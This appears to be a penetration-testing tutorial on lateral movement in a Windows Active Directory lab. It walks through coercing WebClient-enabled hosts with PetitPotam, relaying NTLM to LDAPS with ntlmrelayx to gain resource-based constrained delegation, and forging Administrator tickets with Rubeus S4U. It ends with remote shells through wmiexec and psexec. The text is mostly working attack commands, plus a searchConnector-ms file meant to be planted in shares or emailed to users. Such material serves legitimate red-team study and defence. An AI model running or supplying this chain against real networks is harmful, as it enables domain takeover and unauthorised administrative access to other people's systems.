Lateral Movement – WebClient

Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation and domain escalation. There are various examples which involve the Print Spooler service, the PetitPotam attack or the lock screen of Windows that trigger machine accounts to authenticate with another system and relay this authentication on the domain controller.

The PetitPotam attack enables a threat actor which has established access on the organization network to compromise the domain. However, this attack could be combined with resource based constrained delegation in order to gain elevated access to other systems on the network which are running the WebDav service as a lateral movement option.

The configuration of Responder should be modified to disable the HTTP service to avoid conflict with the ntlmrelayx tool which is going to capture HTTP authentication. Executing the following will open the configuration file of Responder.

sudo vi /usr/share/responder/Responder.conf 

Execution of Responder is required in order to generate the Windows machine name that could be used at a later stage during the execution of the PetitPotam attack. WebDav clients can pass authentication automatically to a netbios name and not to an IP address. Therefore the attack will not work if an IP address is used.

sudo responder -I eth0

In this instance the Responser Machine Name was: “WIN-UBNW4FI3AP0“.

The ntlmrelayx tool from Impacket suite can perform automatically resource based constrained delegation attacks with the “–delegate-access” flag. The target host will be the domain controller and authentication will be relayed via the LDAP protocol.

python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support

The GetWebDAVStatus tool can be executed from an implant via execute-assembly (Cobalt Strike, Metasploit etc.) in order to identify systems which are running the WebClient service and therefore could be used for lateral movement. The tool was developed by Dave Cossa and uses the named pipe “DAV RPC SERVICE” to determine the hosts which are running the service.

GetWebDAVStatus.exe 10.0.0.4

Alternatively, the “webclientservicescanner” python tool can be used from a non domain joined system against a network range. However, valid domain credentials are required.

webclientservicescanner purple.lab/pentestlab:Password1234@10.0.0.1-10.0.0.9

In the event that no clients are running the web client service can be enabled remotely by using “searchConnector-ms” files as described by David Middlehurst in his article about search connectors and library files. The following is a schema example file which was presented in the article and can be planted in an SMB share or delivered via email towards a number of users to coerce the service to start.

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <iconReference>imageres.dll,-1002</iconReference>
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <iconReference>https://w.dtm.uk/0001.ico</iconReference>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://w.dtm.uk/</url>
    </simpleLocation>
</searchConnectorDescription>

From the results above two hosts can be used for lateral movement. (10.0.0.4 and 10.0.0.9). Executing the PetitPotam exploit using the Windows machine name from Responder and the host which is running the WebClient service will force the machine account of the target IP address to authenticate with the system which is configured to receive that authentication.

PetitPotam.exe WIN-UBNW4FI3AP0@80/pentestlab 10.0.0.4

The machine account of the target host (PC1$) will authenticate with the domain controller via LDAP connection. Since the flag “–delegate-access” has been used during execution of ntlmrelayx a new computer account will be created on the domain with delegation permissions over the host PC1 (10.0.0.4).

The new computer account will be visible into the Active Directory object “Computers“.

The PC1$ machine account will have some permissions over the new computer account.

The attribute “msDS-AllowedToActOnBehalfOfOtherIdentity” of the PC1 (10.0.0.4) host has been modified and therefore the new machine account (WVLFLLKZ) has delegation permissions.

The methodology of Resource Based Constrained Delegation is now applicable and could be used to establish an elevated session. Execution of the following command will calculate the hash values of the new machine account password.

.\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l<i$;UzD7W'

Rubeus support the service for user (S4U) kerberos extension and can be used to request a service ticket for the CIFS service of the target host on behalf of the Administrator account. The initial ticket request will correspond to the machine account.

.\Rubeus.exe s4u /user:WVLFLLKZ$ /aes256:E0B3D87B512C218D38FAFDBD8A2EC55C83044FD24B6D740140C329F248992D8F /impersonateuser:Administrator /msdsspn:host/pc1.purple.lab /altservice:cifs /nowrap /ptt

The second request for a ticket will correspond to the Administrator account.

The final ticket will be requested on behalf of the administrator account using the Kerberos extension service for user proxy (S4U2proxy). The ticket will be for the service common internet file system (CIFS) and could be used to get direct access on the host via SMB or WMI protocols.

Executing “klist” will confirm that the ticket is cached into the current session.

klist

Since the ticket is cached the contents of the C: drive of the target computer can be displayed using the command below:

ls \\PC1.purple.lab\c$

The ticket will be exported from Rubeus as based64 encoded. The following command will decode the ticket and write the output in a file with the .kirbi extension.

echo "<base64>" | base64 -d > admin.kirbi

The kirbi ticket can be converted to .ccache format with “ticketConverter” utility. Tools that support Kerberos authentication can make use of the ticket for connection via the environmental variable “KRB5CCNAME“.

ticketConverter.py /home/kali/admin.kirbi admin.ccache
export KRB5CCNAME=admin.ccache

The “wmiexec” utility from Impacket suite can be utilized from the same console to establish access with the target host as an administrator user using Kerberos authentication.

wmiexec.py -k -no-pass purple.lab/administrator@pc1.purple.lab

Alternatively, a connection can be established using the “psexec” utility.

python3 psexec.py -k -no-pass purple.lab/administrator@pc1.purple.lab

References

• https://github.com/G0ldenGunSec/GetWebDAVStatus
• https://github.com/Hackndo/WebclientServiceScanner
• https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb
• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate
• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
• https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/
• https://github.com/dtmsecurity/examples